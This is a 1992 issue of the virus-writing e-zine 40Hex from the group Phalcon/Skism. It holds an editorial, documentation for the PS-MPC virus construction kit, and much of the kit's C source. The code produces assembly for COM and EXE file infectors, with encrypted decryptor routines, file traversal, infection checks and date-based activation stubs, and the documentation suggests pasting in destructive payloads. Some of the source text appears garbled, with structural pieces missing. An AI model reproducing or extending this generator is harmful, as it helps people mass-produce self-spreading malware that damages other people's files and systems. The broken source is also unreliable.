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I don't want anybody complaining about not being able to compile the PS-MPC
utility in 40Hex-8, so listen close.  You must set the "unsigned chars" option 
on in order for the utility to compile properly.  It is in the Options/Compile 
menu.  Spread the word along with 40Hex...

--- Telegard v2.5k Standard
 * Origin: LandFill BBS (242:914/2.0)
40Hex Number 8 Volume 2 Issue 4                                       File 000

     Welcome to 40 Hex issue 8.  First off, this month is going to be
Boot Sector Appreciation Month at 40Hex.  We will have a fully
disassembled Michelangelo, along with a Pakistani Brain variant called
Ashar.  But as always, there is a lot of other news that I have to
discuss with all you, so on with the show.
     For the last couple months, we have recieved quite a bad rap on
Fidonet.  This has to do with the original SKISM Viruses (Like SKISM
1-14).  Like everyone, we had to start somewhere.  So what if our
original virii blew large goats.  Judge us on some of our newer stuff.
Oh, what is this you say?  You can't find our newer stuff?  Well,
neither can McAfee.  Everyone will become enlightened soon enough.
Other people on Fido who have been giving us a hard time, think it
bothers us?  Think again, we love it!  One of our personal favorites is
Gary Watson, who amuses us with each new post, and Tag Line (which are
     Secondly, Hellraiser is back as an author for 40Hex!  He currently
doesn't have a modem, but he can at least do some slave work.  Great to
have you back HR.
     Another way in which 40Hex is going to help support virus community
is by the brand new PHALCON/SKISM Macintosh Programming Team!  The four
people involved in that are Renegade, Sixo, Trojan, and Wintermute!
They will be cranking out a lot of quality Macintosh utilities, trojans
and other interesting things very soon!  Look for them on all of our
     -=PHALCON/SKISM=- Net will be arriving to a BBS near you very soon.
If you are interested, leave mail to any one of our fine support

                        40Hex-8 Table of contents

             40Hex-8.000......................You Are Here!
             40Hex-8.001......................PS-MPC (MassProducedCode)
             40Hex-8.002......................Putav, an expose!
             40Hex-8.003......................Findav -P/S- Style
             40Hex-8.004......................Checkav -P/S- Original
             40Hex-8.005......................StarShip Virus Info
             40Hex-8.006......................Virus Spotlite: Michelangelo
             40Hex-8.007......................EXE Infectors and you
             40Hex-8.008......................Disassembly of ASHAR
             40Hex-8.009......................Ear-6 source en Espa?ol
             40Hex-8.010......................Letter to the Editor

    Greetings to:  The new and improved [NuKE], FirstStrike, Apache
Warrior, all PHALCON/SKISM Members, Backstabbers and everyone else we
forgot to greet!

40Hex Number 8 Volume 2 Issue 4                                       File 001

    Once again, -=PHALCON/SKISM=- pisses off the PD scene.  Now anyone
can make their own virus, and give it to Gary Watson, the only guy on
Fidonet who we love.  Without him, we would never get the fame that we
now covet so greatly.  Well, that is until we got our official Pepsi
Gotta Have It Cards.  Thank you Gary.
                                        -) Gheap
----------------------------- Docs -n- code begin -----------------------------
                   Pretty Slick Multimedia Personal Computer
               Phalcon/Skism Mass-Produced Code Generator 0.90?
                             Created by Dark Angel
  TABLE OF CONTENTS                                          i
  DEDICATION                                                 i
  DISCLAIMER                                                ii
  PURPOSE                                                   ii
  WHAT IS THE PS-MPC?                                        1
  USING THE PS-MPC                                           1
  NO ACTIVATION ROUTINES                                     1
  WHY NO IDE                                                 2
  SOURCE CODE AVAILABILITY                                   2
  PROBLEMS                                                   2
  FUTURE ENHANCEMENTS                                        2
  HISTORY OF VIRUS TOOLKITS                                  A
       The author  hereby releases  this program and its source code into the
  public domain  as "freeware."   All  code generated  by the  program  must,
  however, retain  the designation  of said program, although all other parts
  may be  modified at  the user's  discretion.   The  author  dedicates  this
  program to  both the virus and anti-virus communities, both of which profit
  from the introduction of the Phalcon/Skism Mass-Produced Code Generator.
       Thanks are  due to  NoWhere Man  for his  excellent program VCL, which
  served as the inspiration for this package.
     PS-MPC Documentation             - i -             Phalcon/Skism 1992
       This  program  may  cause  either  the  intentional  or  unintentional
  disruption of  normal brain  wave activity  of the  user due to the extreme
  shock quality  of the  program.   The author hereby absolves himself of all
  liability.  Persons with pacemakers beware!
       The code  produced by  the Phalcon/Skism  Mass-Produced Code Generator
  is not  designed to be damaging; however, the author is not responsible for
  incidental damages  caused by  use of  the program.  Further, the author is
  not responsible  for damages caused by changes to the code generated by the
  PS-MPC.   The author does not condone the illegal spread of executable code
  created in part or in whole by the PS-MPC.  All source code and  executable
  files created with the aid of the PS-MPC must be distributed with the reci-
  pient's full knowledge  of the  contents.    Malicious use  of the  code is
  strictly prohibited.
       The Phalcon/Skism  Mass-Produced Code  Generator is  not  designed  to
  create malicious  code; rather,  it is  a learning tool from which a person
  may learn  to write effective viral code.  The code generated by the PS-MPC
  is highly  optimised for  both size  and speed  and is  therefore the  code
  generated can  be used  by the fledgling virus writer as a model for future
     PS-MPC Documentation            - ii -             Phalcon/Skism 1992
       The  Phalcon/Skism  Mass-Produced  Code  Generator  is  a  tool  which
  generates viral  code according  to user-designated  specifications.    The
  output is  in Masm/Tasm-compatible  Intel 8086 assembly and it is up to the
  user to  assemble the output into working executable form.  The features of
  the PS-MPC include the following:
    o Over  150 encryption  techniques, randomly generated during each run of
      the PS-MPC
    o Compact, commented code, much tighter than VCL
    o COM/EXE infections
    o Two types of traversals
    o Optional infection of Command.Com
    o Critical error handler support
       The syntax of the PS-MPC is simple:
       PS-MPC <file1> <file2> <file3>...
       The parameters  given to the PS-MPC are the names of the configuration
  files.  For example, to create two separate viruses using the configuration
  files  FOOBAR1.CFG   and  FOOBAR2.CFG,   simply  type  "PS-MPC  FOOBAR1.CFG
  FOOBAR2.CFG" at the prompt.
       The configuration  file is  a text file containing a set of parameters
  which define  the output  of the  PS-MPC.   A  sample  configuration  file,
  SKELETON.CFG is  included  with  the  package.    This  configuration  file
  contains all  the acceptable  parameters that  the PS-MPC  will accept.  It
  also includes  the defaults to each of these parameters.  The configuration
  file is  self-explanatory, so there is no need to go into further detail at
  this time.
       When the  Generator has  completed creating  the source  code  file/s,
  simply assemble  the output  file/s  with  your  favorite  assembler/linker
  combination.  A multi-pass assembler is recommended.  Masm is a poor choice
  for an  assembler; try  Tasm.   Masm requires  the code  to  include  extra
  segment overrides which unnecessarily add to the code length.  Masm 6.0 may
  fix these  problems (I'm  not sure  since I  don't have  it).  Tasm, on the
  other hand,  is an  excellent, fast,  multipass assembler  far superior  to
       I have  not included  any activation  routines in  the package  simply
  because I  do not  think  the  power  of  creating  potentially-destructive
  viruses should  be in  the hands  of persons  incapable of  coding a simple
  activation routine  in assembly.   If  you can rip a simple FAT-annihilator
  out of  another trojan,  then I  cannot stop  you from  doing so.  But just
  remember that  the most  memorable viruses  are not  necessarily those that
  cause the  most damage,  but are usually those that have unusual activation
       Upon finding  activation conditions,  the PS-MPC will generate a short
  stub for  the activation  routine.   This is  located immediately after the
  code for  the restoration of the executable files.  It is identified by the
  label "activate"  and is  followed by a return.  Insert your own activation
  routine between those two lines.
     PS-MPC Documentation             - 1 -             Phalcon/Skism 1992
  WHY NO IDE (Integrated Development Environment)
       Everyone agrees  that Microsoft  Windows is  for cripples.  Obviously,
  you, the  user of  the PS-MPC, are no cripple, so you need no puny IDE with
  colourful, deluxe  windows to  aid you.  If you are a cripple, go ahead and
  create the  configuration file in your favorite Windows text editor.  Hell,
  port the  code to  the Macintosh  and you  can be  truly crippled (although
  you'll have your pretty windows and icons).
       This program  is distributed  with full  source code.    Although  the
  source should  be self-explanatory,  I have gone back and commented several
  portions in  order to facilitate understanding.  The program was written in
  Turbo C  2.0 and  compiled in the tiny memory model.  I trust that you will
  not hack  this program and call it your own.  Source code is available only
  because I think it will aid in your understanding of the program.
       This program  was written  hastily.    The  bulk  of  the  coding  was
  completed in  under two  days.   Features were  added  by  the  process  of
  accretion during  the following  week.   Needless to  say, the  code is now
  extremely unmanageable.  If there is enough interest in the package, I will
  rewrite it  in order  to alleviate  the strain  caused in  maintaining such
  code.  This will help in adding features as the need arises.

       There MAY be some bugs in this version since it hasn't been thoroughly
  tested yet.  Report all bugs to me (duh). Be sure to save the configuration
  file of the faulty code so the bug may be reproduced.  Better yet, find the
  problem, fix the C source, and send it to me.  Zowie!
       As you  may have already noticed, this is a pre-1.0 release version of
  the Generator.   There  are several  features which  I wish  to add  before
  version 1.0.   These  include, but  are not  limited to,  resident viruses,
  padded-EXE infections  (shorter routine),  and better  documentation(!).  A
  few surprises  will be  thrown in as well.  I do not plan on increasing the
  size of  the PS-MPC.COM file dramatically, so with every addition will come
  code to  keep the  increase in  file size to a minimum.  I do not intend to
  devote too  much time to the project as I personally don't actually use the
  generator to spew out code for the group.
  Note: The  version included with 40Hex-8 is not the latest version.  Due to
  space considerations, we could not include the source code to version 0.91?
  which is somewhat larger.

     PS-MPC Documentation             - 2 -             Phalcon/Skism 1992
       The first  known virus  toolkit was  called VCS, or Virus Construction
  Set.   This program  generated a  new virus each time it was run.  However,
  there were  no code differences at all between any two viruses generated by
  VCS.   All viruses  generated were  1077 bytes  in length  and all could be
  detected with  the identical  scan string.   The advantage in this approach
  was that  the user  needed absolutely no knowledge of 8086 assembly to take
  advantage of this program.  This program of limited usefulness spawned only
  one well-known variant called Manta.  It is not even worth mentioning here.
       The second  virus toolkit  was CrazySoft, Inc.'s Dark Avenger Mutation
  Engine (MtE).   This  magnificent work  of Bulgarian  coding allowed  virus
  authors to  create viruses  with an  almost limitless  number of decryption
  routines.   Although the  author needed  to know how to write 8086 assembly
  code, no  knowledge of  the inner workings of MtE save the entry parameters
  was needed  to use  this toolkit.   It  has since  spawned several viruses,
  including Dedicated, Pogue, Fear, and Groove.
       The next  virus toolkit  to be released was VCL, or Virus Construction
  Laboratory.  This was written by NoWhere Man of NuKE.  This toolkit allowed
  the user  many options,  including the creation of parasitic COM infectors,
  spawning EXE infectors, trojan horses and logic bombs.  Since it could only
  handle parasitic  infections of  the COM  file format,  it was  of  limited
  usefulness.   Additionally, it  incorporated only  one decryption  formula,
  once again  limiting its usefulness.  Further, the initial release included
  a quirky  installation program  which  failed  to  install  properly  under
  certain conditions.   However,  this  package  contained  a  colourful  IDE
  loosely based  on the Borland interface.  This IDE was incredibly simple to
  use and  even the  average Joe  could understand  how  to  use  it  without
  understanding 80x86  assembly.    Unfortunately,  the  activation  routines
  included with  the package  were of  limited usefulness.    Most  of  these
  involved manipulating the BIOS memory area at segment 40h.
     PS-MPC Documentation             - A -             Phalcon/Skism 1992
------------------------------ Source code begins -----------------------------
#ifndef __VHEADER_H
#define __VHEADER_H

/* infect */
#define COM     1
#define EXE     2

/* traverse */
#define NONE    0
#define DOT_DOT 1

typedef struct {
  char always;
  char number;
  char month;
  char day;
  int  year;
  char dow;
  int  monthday;
  char hour;
  char minute;
  char second;
  char percentage;
} activation_conditions;

typedef struct {
  unsigned infectCOM   : 1;
  unsigned infectEXE   : 1;
  unsigned traverse    : 1;       /* Currently only two types */
  unsigned encrypt     : 1;
  unsigned int24       : 1;
  unsigned CommandCom  : 1;
  unsigned allowzero   : 1;
  unsigned calls_check : 1;
} parameters;

typedef struct {
  char       configfilename[80];
  char       asmfilename[80];
  char       id[3];
  char       virusname[80];
  char       virusnamedelim;
  char       authorname[80];
  char       authornamedelim;
  unsigned   minsize, maxsize;
  char       maxinfect;
  parameters p;
  char       xor_value;
  char       xor_comment[40];
  char       activation;
  activation_conditions activate, plusminus;
} globals;

/* prototypes from vmain.c */
void print(char *s, char *t);
void printlabel(char *s, char *t);
void addvar(char *s, char *t, char *u);
void printblank(void);

/* prototypes from vheap.c */
void addheap(char *s, char *t, char *u);
void _addheap(char *s);
void resetheap(void);

/* code generating prototypes */
void code_header(void);
void code_encryption(void);
void code_setup(void);
void code_traversal(void);
void code_check_activation(void);
void code_return(void);
void code_activate(void);
void code_messages(void);
void code_check(void);
void code_infect(void);
void code_subroutines(void);
void code_variables(void);
void code_heap(void);
void code_tail(void);

#ifndef MAIN
extern globals config;

#endif /* __VHEADER_H */
----------------------------------- Cut Here ----------------------------------
#include "vheader.h"

void code_activate(void)
  if (config.activation)
    printlabel("activate:","Conditions satisfied");
    printlabel("; Insert your activation code here","");
    print("jmp  exit_virus","");
----------------------------------- Cut Here ----------------------------------
#include "vheader.h"

void code_get_date(void);
void code_get_time(void);
void code_jmp(char c);

char coded_date, coded_time, Activation;

void code_check_activation(void)
  char b[80];

  coded_date = coded_time = 0;
  Activation = config.activation;

  if (config.activate.always)
    printlabel("jmp  activate","Always activate");
  else {
    if (config.activate.month) {
      sprintf(b,"cmp  dh,%d",config.activate.month);
      print(b,"Check month");
    if (config.activate.day) {
      sprintf(b,"cmp  dl,%d",config.activate.day);
      print(b,"Check date");
    if (config.activate.year) {
      sprintf(b,"cmp  cx,%u",config.activate.year);
      print(b,"Check year");
    if (config.activate.dow != 255) {
      sprintf(b,"cmp  al,%d",config.activate.dow);
      print(b,"Check date of week");
    if (config.activate.monthday) {
      sprintf(b,"cmp  dx,0%xuh",config.activate.monthday);
      print(b,"Check month/date");

    if (coded_date) printblank();

    if (config.activate.hour != 255) {
      sprintf(b,"cmp  ch,%d",config.activate.hour);
      print(b,"Check the hour");
    if (config.activate.minute != 255) {
      sprintf(b,"cmp  cl,%d",config.activate.minute);
      print(b,"Check the minute");
    if (config.activate.second != 255) {
      sprintf(b,"cmp  dh,%d",config.activate.second);
      print(b,"Check the seconds");
    if (config.activate.percentage) {
      sprintf(b,"cmp  dl,%d",config.activate.percentage);
      print(b,"Check the percentage");

    if (coded_time) printblank();

void code_jmp(char c)
  if (--Activation) {
    if (c == 1)
      print("jb   exit_virus","");
    else if (c == 0)
      print("jnz  exit_virus","");
    else if (c == 255)
      print("ja   exit_virus","");
  } else {
    if (c == 1)
      print("jae  config.activate","");
    else if (c == 0)
      print("jz   config.activate","");
    else if (c == 255)
      print("jbe  config.activate","");

void code_get_date(void)
  if (!coded_date) {
    print("mov  ah,2ah","Get current date");
    print("int  21h","");

void code_get_time(void)
  if (!coded_time) {
    print("mov  ah,2ch","Get current time");
    print("int  21h","");
----------------------------------- Cut Here ----------------------------------
#include "vheader.h"

void checkCOM(void);

void code_check(void)
  if (config.p.calls_check)
  print("mov  ah,4eh","find first file");
  print("mov  cx,7","any attribute");
  print("int  21h","DS:DX points to mask");
  if (config.p.calls_check)
    print("jc   exit_infect_mask","No mo files found");
    print("jc   done_infections","No mo files found");
  print("mov  al,0h","Open read only");
  print("call open","");
  print("mov  ah,3fh","Read file to buffer");
  print("lea  dx,[bp+buffer]","@ DS:DX");
  print("mov  cx,1Ah","1Ah bytes");
  print("int  21h","");
  print("mov  ah,3eh","Close file");
  print("int  21h","");
  if (config.p.infectEXE) {
    if (config.p.infectCOM) {
      print("cmp  word ptr [bp+buffer],'ZM'","EXE?");
      print("jz   checkEXE","Why yes, yes it is!");
    printlabel("checkEXE: cmp  word ptr [bp+buffer+10h],id","is it already infected?");
    print("jnz  infect_exe","");
  } else
  print("mov  ah,4fh","find next file");
  print("jmp  short findfirstnext","");
  if (config.p.calls_check) {
    printlabel("exit_infect_mask: ret","");

void checkCOM(void)
  char s[80];

  if (!config.p.CommandCom)
    print("mov  ax,word ptr [bp+newDTA+35]","Get tail of filename");
    print("cmp  ax,'DN'","Ends in ND? (commaND)");
    print("jz   find_next","");
  print("mov  ax,word ptr [bp+newDTA+1Ah]","Filesize in DTA");
  if (config.minsize)
    if (config.minsize == 1) /* automatic calculation */
      if (config.p.encrypt)
        strcpy(s,"cmp  ax,(heap-decrypt)");
        strcpy(s,"cmp  ax,(heap-startvirus)");
    else  /* if (minsize != 1) */
      sprintf(s,"cmp  ax,%u",config.minsize);
    print(s,"Is it too small?");
    print("jb   find_next","");
  if (config.maxsize)
    if (config.maxsize == 1) /* automatic calculation */
      if (config.p.encrypt)
        strcpy(s,"cmp  ax,65535-(endheap-decrypt)");
        strcpy(s,"cmp  ax,65535-(endheap-startvirus)");
      sprintf(s,"cmp  ax,%u",config.maxsize);
    print(s,"Is it too large?");
    print("ja   find_next","");

  print("mov  bx,word ptr [bp+buffer+1]","get jmp location");
  if (config.p.encrypt)
    print("add  bx,heap-decrypt+3","Adjust for virus size");
    print("add  bx,heap-startvirus+3","Adjust for virus size");
  print("cmp  ax,bx","");
  print("je   find_next","already infected");
  print("jmp  infect_com","");
----------------------------------- Cut Here ----------------------------------
#include <stdlib.h>

#include "vheader.h"

void code_loop_count(void);
void code_loop_start(void);
void code_decrypt_code(void);

char mem_counter;
char mem_registers[4][3] = {

char loop_counter;
char loop_registers[7][3] = {
  "ax", "bx", "cx", "dx", "bp", "si", "di"

char xor_registers[4][2] = {
  { 0x81, 0x37 },
  { 0x81, 0x76 },
  { 0x81, 0x34 },
  { 0x81, 0x35 }

char add_registers[4][2] = {
    { 0x81, 0x07 }, /* add [bx],xxxx / db 81h, 7h,xxh,xxh    */
    { 0x81, 0x46 }, /* add [bp],xxxx / db 81h,46h,00,xxh,xxh */
    { 0x81, 0x04 },
    { 0x81, 0x05 },

void code_encryption(void)
  if (config.p.encrypt) {
    printlabel("decrypt:","handles encryption and decryption");
    if ((loop_counter = random(10)) > 6)   /* if out of bounds */
      loop_counter = 2;                    /* set it = to cx   */
    while (1) {
      mem_counter = random(4);
      if (strcmp(mem_registers[mem_counter = random(4)],
    if (random(2)) {
    } else {

void code_loop_count(void)
  char b[80];
  sprintf(b,"mov  %s,(offset heap - offset startencrypt)/2",

void code_loop_start(void)
  char b[80];
  sprintf(b,"mov  %s,offset startencrypt",
  print(b,"start of decryption");

void code_decrypt_code(void)
    char b[80],c[80];
    config.xor_value = 0;
    switch (random(2))
      case 0 : sprintf(b,"db   %s%2.2xh,%2.2xh%s",
               (config.p.infectEXE) ? "2eh," : "", xor_registers[mem_counter][0],
               xor_registers[mem_counter][1],(mem_counter == 1) ? ",0":"");

               sprintf(c,"xor word ptr %s[%s], xxxx",
               (config.p.infectEXE) ? "cs:" : "",mem_registers[mem_counter]);
      case 1 : sprintf(b,"db   %s%2.2xh,%2.2xh%s",
               (config.p.infectEXE) ? "2eh," : "", add_registers[mem_counter][0],
               add_registers[mem_counter][1],(mem_counter == 1) ? ",0":"");

               sprintf(c,"add word ptr %s[%s], xxxx",
               (config.p.infectEXE) ? "cs:" : "",mem_registers[mem_counter]);
               config.xor_value = 0x28;
               strcpy(config.xor_comment,"flip between add/sub");
    printlabel("decrypt_value dw 0","initialised at zero for null effect");
    sprintf(c,"inc  %s",mem_registers[mem_counter]);
    print(c,"calculate new decryption location");
    if (loop_counter - 2)
      sprintf(b,"dec  %s",loop_registers[loop_counter]);
      print(b,"If we are not done, then");
      print("jnz  decrypt_loop","decrypt mo'");
    } else
      print("loop decrypt_loop","decrypt mo'");
----------------------------------- Cut Here ----------------------------------
#include "vheader.h"

void code_header(void)
  char b[80];
  sprintf(b,"; %s : %s by %s",config.asmfilename,
         (config.virusname[0]) ? config.virusname : "Unknown",
         (config.authorname[0])? config.authorname: "Unknown");
  printlabel("; Created wik the Phalcon/Skism Mass-Produced Code Generator","");
  sprintf(b,"; from the configuration file %s",config.configfilename);
  printlabel(".model tiny","Handy directive");
  printlabel(".code","Virus code segment");
  print("org    100h","COM file starting IP\n");
  if (config.p.infectEXE)
    sprintf(b,"id = '%s'",config.id);
    printlabel(b,"ID word for EXE infections");
  if (config.p.infectCOM)
    if (config.p.encrypt)
      printlabel("entry_point: db 0e9h,0,0","jmp decrypt");
      printlabel("entry_point: db 0e9h,0,0","jmp startvirus");
----------------------------------- Cut Here ----------------------------------
#include "vheader.h"

char heap[30][80];
char max;

void code_heap(void)
  printlabel("heap:","Variables not in code");
  if (max)
    while (max--)
    printlabel("; No heap to speak of","");
  printlabel("endheap:","End of virus");

void addheap(char *s, char *t, char *u)
  if (*u)
    sprintf(heap[max++],"%-20.20s%-20.20s; %-37.37s",s,t,u);

void _addheap(char *s)

void resetheap(void)
----------------------------------- Cut Here ----------------------------------
#include "vheader.h"

void write_encrypt(void);
void code_infect_EXE(void);

void code_infect(void)
  if (config.p.infectEXE) {
    if (config.p.infectCOM)
      print("jmp  short finishinfection","");
  if (config.p.infectCOM) {
    printlabel("infect_com:","ax = filesize");
    print("mov  cx,3","");
    print("sub  ax,cx","");
    print("lea  si,[bp+offset buffer]","");
    print("lea  di,[bp+offset save3]","");
    print("mov  byte ptr [si-3],0e9h","");
    print("mov  word ptr [si-2],ax","");
    if (config.p.encrypt)
      print("add  ax,103h","");
      print("push ax","needed later");
  print("push cx","Save # bytes to write");
  print("xor  cx,cx","Clear attributes");
  print("call attributes","Set file attributes");
  print("mov  al,2","");
  print("call open","");
  print("mov  ah,40h","Write to file");
  print("lea  dx,[bp+buffer]","Write from buffer");
  print("pop  cx","cx bytes");
  print("int  21h","");
  print("mov  ax,4202h","Move file pointer");
  print("xor  cx,cx","to end of file");
  print("cwd","xor dx,dx");
  print("int  21h","");
  if (config.p.encrypt) {
  } else {
    print("mov  ah,40h","Concatenate virus");
    print("lea  dx,[bp+startvirus]","");
    print("mov  cx,heap-startvirus","# bytes to write");
    print("int  21h","");
  print("mov  ax,5701h","Restore creation date/time");
  print("mov  cx,word ptr [bp+newDTA+16h]","time");
  print("mov  dx,word ptr [bp+newDTA+18h]","date");
  print("int  21h","");
  print("mov  ah,3eh","Close file");
  print("int  21h","");
  print("mov ch,0","");
  print("mov cl,byte ptr [bp+newDTA+15h]","Restore original");
  print("call attributes","attributes");
  if (config.maxinfect)
    print("dec  byte ptr [bp+numinfec]","One mo infection");
    print("jnz  mo_infections","Not enough");
    if (config.p.calls_check)
      print("pop  ax","remove call from stack");
    print("jmp  done_infections","");
  printlabel("mo_infections: jmp find_next","");

void write_encrypt(void)
  if (!config.p.allowzero)
  print("mov  ah,2ch","Get current time");
  print("int  21h","dh=sec,dl=1/100 sec");
  if (!config.p.allowzero) {
    print("or  dx,dx","Check if encryption value = 0");
    print("jz  get_encrypt_value","Get another if it is");
  print("mov  [bp+decrypt_value],dx","Set new encryption value");
  addheap("code_store:","db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?)","");
 _addheap("; The following code is the buffer for the write function");
  print("lea  di,[bp+code_store]","");
  print("mov  ax,5355h","push bp,push bx");
  print("lea  si,[bp+decrypt]","Copy encryption function");
  print("mov  cx,startencrypt-decrypt","Bytes to move");
  print("push si","Save for later use");
  print("push cx","");
  print("rep  movsb","");
  if (config.xor_value)
    char b[80];
    sprintf(b,"xor  byte ptr [bp+decrypt_loop+%c],0%2.2xh",
           (config.p.infectEXE) ? '2' : '1', config.xor_value);
  print("lea    si,[bp+write]","Copy writing function");
  print("mov    cx,endwrite-write","Bytes to move");
  print("rep    movsb","");
  print("pop    cx","");
  print("pop    si","");

  print("pop    dx","Entry point of virus");

  print("push   di","");
  print("push   si","");
  print("push   cx","");
  print("rep    movsb","Copy decryption function");
  print("mov    ax,5b5dh","pop bx,pop bp");
  print("mov    al,0c3h","retn");
  print("add    dx,offset startencrypt - offset decrypt","Calculate new");
  print("mov    word ptr [bp+patch_startencrypt+1],dx","starting offset of");
  print("call   code_store","decryption");
  print("pop    cx","");
  print("pop    di","");
  print("pop    si","");
  print("rep    movsb","Restore decryption function");

void code_infect_EXE(void)
  print("les  ax, dword ptr [bp+buffer+14h]","Save old entry point");
  print("mov  word ptr [bp+jmpsave2], ax","");
  print("mov  word ptr [bp+jmpsave2+2], es","");
  print("les  ax, dword ptr [bp+buffer+0Eh]","Save old stack");
  print("mov  word ptr [bp+stacksave2], es","");
  print("mov  word ptr [bp+stacksave2+2], ax","");
  print("mov  ax, word ptr [bp+buffer + 8]","Get header size");
  print("mov  cl, 4","convert to bytes");
  print("shl  ax, cl","");
  print("xchg ax, bx","");
  print("les  ax, [bp+offset newDTA+26]","Get file size");
  print("mov  dx, es","to DX:AX");
  print("push ax","");
  print("push dx","");
  print("sub  ax, bx","Subtract header size from");
  print("sbb  dx, 0","file size");
  print("mov  cx, 10h","Convert to segment:offset");
  print("div  cx","form");
  print("mov  word ptr [bp+buffer+14h], dx","New entry point");
  print("mov  word ptr [bp+buffer+16h], ax","");
  print("mov  word ptr [bp+buffer+0Eh], ax","and stack");
  print("mov  word ptr [bp+buffer+10h], id","");
  print("pop  dx","get file length");
  print("pop  ax","");
  if (config.p.encrypt)
    print("add  ax, heap-decrypt","add virus size");
    print("add  ax, heap-startvirus","add virus size");
  print("adc  dx, 0","");
  print("mov  cl, 9","");
  print("push ax","");
  print("shr  ax, cl","");
  print("ror  dx, cl","");
  print("adc  dx, ax","");
  print("pop  ax","");
  print("and  ah, 1","mod 512");
  print("mov  word ptr [bp+buffer+4], dx","new file size");
  print("mov  word ptr [bp+buffer+2], ax","");
  print("push cs","restore ES");
  print("pop  es","");
  if (config.p.encrypt)
    print("push word ptr [bp+buffer+14h]","needed later");
  print("mov  cx, 1ah","");
----------------------------------- Cut Here ----------------------------------
/* The Phalcon/Skism Mass-Produced Code Generator *
 * Version 0.90? - 27 Jul 92 - Initial Release    *
 * Written by Dark Angel of Phalcon/Skism         *
 * Source code released with 40Hex-8              *

#include <stdio.h>

#define MAIN
#include "vheader.h"
#undef MAIN

globals config;

void parse_config(void);
unsigned getnumber(int line, char *d, char ok, char *next);
char getyn(int line, char *d);
void setplusminus(char *a, char b);
void parseactivate(int line, char *d, char min, char max, char *a, char *b,char *s);
void printerror(int line, char c);
void getDBname(char *orig, char *name,char *delim);

FILE *fp;

void main(int argc, char **argv)
  char c,filename[80];

  puts("PS-MPC ? Phalcon/Skism Mass Produced Code Generator");
  puts("       ? Version 0.90?        Written by Dark Angel\n");

  if (argc < 2)
    puts("Syntax: PS-MPC <file1> <file2> ...");
    puts("  file1 = name of first configuration file");
    puts("  file2 = name of second configuration file");

  for (c=1;c<argc;c++)
    if ((fp = fopen(argv[c],"rt")) == NULL)
      printf("Error opening configuration file (%s).\n",argv[c]);
      puts("Skipping file...");

    printf("Reading configuration file (%s)...",argv[c]);


    if (!config.p.infectCOM && !config.p.infectEXE) {
      puts("Warning: Virus does not infect any type of file.");
      puts("Remedy:  Use the \"infect\" parameter in the configuration file.");
      puts("Skipping file...");

    if (!config.asmfilename[0]) {
      puts("Warning: No target file name specified.");
      puts("Remedy:  Use the \"filename\" parameter in the configuration file.");
      puts("Skipping file...");

    if ((fp = fopen(config.asmfilename,"wt")) == NULL)
      printf("Error opening target file (%s).\n",config.asmfilename);
      puts("Skipping file...");

    printf("Creating target file (%s)...",config.asmfilename);

    if (config.p.calls_check)

  puts("\nThank you for using the Phalcon/Skism Mass Produced Code Generator");

void print(char *s, char *t)
  char b[80];
  sprintf(b,"          %s",s);

void printlabel(char *s, char *t)
  int i = 0;
  if (*s)
    if (*t) {
      i = fprintf(fp,"%-40s",s);
      if (i > 40)
        fputc(' ',fp);
      fprintf(fp,"; %s",t);
    } else /* if (*t) */

void addvar(char *s, char *t, char *u)
  char b[80];
  if (*u)
    sprintf(b,"%-20.20s%-20.20s; %s",s,t,u);

void parse_config(void)
    char b[80];
    char *c, *d;
    int  line = 0;
    globals default_globals = {
        "",                       /* Configuration file name              */
        "",                       /* Source code file name                */
        "  ",                     /* EXE ID Word                          */
        "",                       /* Virus name                           */
        '\'',                     /* Deliminator for virus name           */
        "",                       /* Author name                          */
        '\'',                     /* Deliminator for author name          */
        0,                        /* Minimum COM size for infection       */
        0,                        /* Maximum COM size for infection       */
        0,                        /* Infections per run                   */
        { 0,0,NONE,0,0,0,0 },     /* flags                                */
        0,                        /* xor value                            */
        "",                       /* xor comment                          */
        0,                        /* number of activation conditions      */
        { 0,0,0,0,0,-1,0,-1,-1,-1,0 }, /* activation conditions           */
        { 0,0,0,0,0, 0,0, 0, 0, 0,-1}  /* plusminus activation conditions */

    config = default_globals;

    while (1)
        c = fgets(b,100,fp);
        if (!b[0])
        while (isspace(*c)) c++;    /* skip initial spaces */
        if (!*c || *c == ';') continue;    // check if this line is a comment
        d = c;
        while (!isspace(*d)) d++;   /* isolate one word  */
        *d++ = 0;                   /* NULL terminate it */
        while (isspace(*d) || (*d == '=')) d++;

        if (!stricmp(c,"filename"))
          c = d;
          while (!isspace(*d)) d++; /* isolate filename */
          *d = 0;

        else if (!stricmp(c,"traversal"))
          switch (toupper(*d))
            case 'N' : config.p.traverse = NONE; break;
            case 'D' : config.p.traverse = DOT_DOT; break;
            default  : printerror(line,*d);

        else if (!stricmp(c,"encryption")) config.p.encrypt = getyn(line,d);

        else if (!stricmp(c,"infect")) {
          while (!isspace(*d)) {
            switch (toupper(*d))
              case 'C' : config.p.infectCOM = 1; break;
              case 'E' : config.p.infectEXE = 1; break;
              case ',' : break;
              default  : printerror(line,*d);

        else if (!stricmp(c,"idword")) {
          config.id[0] = (isspace(*d)) ? ' ' : *d;
          config.id[1] = (isspace(*(d+1))) ? ' ' : *(d+1);

        else if (!stricmp(c,"minsize")) {
          if (toupper(*d) == 'A')
            config.minsize = 1;
          else {
            config.minsize = getnumber(line,d,0,0);
            if (config.maxsize > 1)
              if (config.minsize > config.maxsize)
                puts("Error: minsize is greater than maxsize!");

        else if (!stricmp(c,"maxsize")) {
          if (toupper(*d) == 'A')
            config.maxsize = 1;
          else {
            config.maxsize = getnumber(line,d,0,0);
            if (config.minsize > 1)
              if (config.maxsize < config.minsize)
                printf("Error: minsize is greater than maxsize!\n");

        else if (!stricmp(c,"infections"))
          config.maxinfect = (unsigned char)getnumber(line,d,0,0);

        else if (!stricmp(c,"errorhandler"))
          config.p.int24 = getyn(line,d);

        else if (!stricmp(c,"commandcom"))
          config.p.CommandCom = getyn(line,d);

        else if (!stricmp(c,"virusname"))

        else if (!stricmp(c,"authorname"))

        else if (!stricmp(c,"allowzero"))
          config.p.allowzero = getyn(line,d);

        else if (!stricmp(c,"always")) {
          config.activate.always = getyn(line,d);
          if (config.activate.always) config.activation++;

        else if (!stricmp(c,"ifmonth"))

        else if (!stricmp(c,"ifday"))

        else if (!stricmp(c,"ifyear"))
          config.activate.year = getnumber(line,d,'+',d);
          setplusminus((char *)&config.plusminus.year,*d);

        else if (!stricmp(c,"ifdow"))
          parseactivate(line,d,0,6,&config.activate.dow,&config.plusminus.dow,"date of week");

        else if (!stricmp(c,"ifmonthday"))
          int  tempint;
